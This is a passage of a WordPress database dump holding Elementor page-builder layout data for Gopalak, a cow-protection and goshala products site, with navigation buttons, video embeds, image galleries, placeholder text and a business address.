leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9816,1650,'_elementor_page_assets','a:0:{}'),(9818,1651,'_elementor_edit_mode','builder'),(9819,1651,'_elementor_template_type','wp-page'),(9820,1651,'_elementor_version','3.7.8'),(9821,1651,'_wp_page_template','elementor_canvas'),(9822,1651,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1579,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\"},{\"id\":1567,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\"},{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total 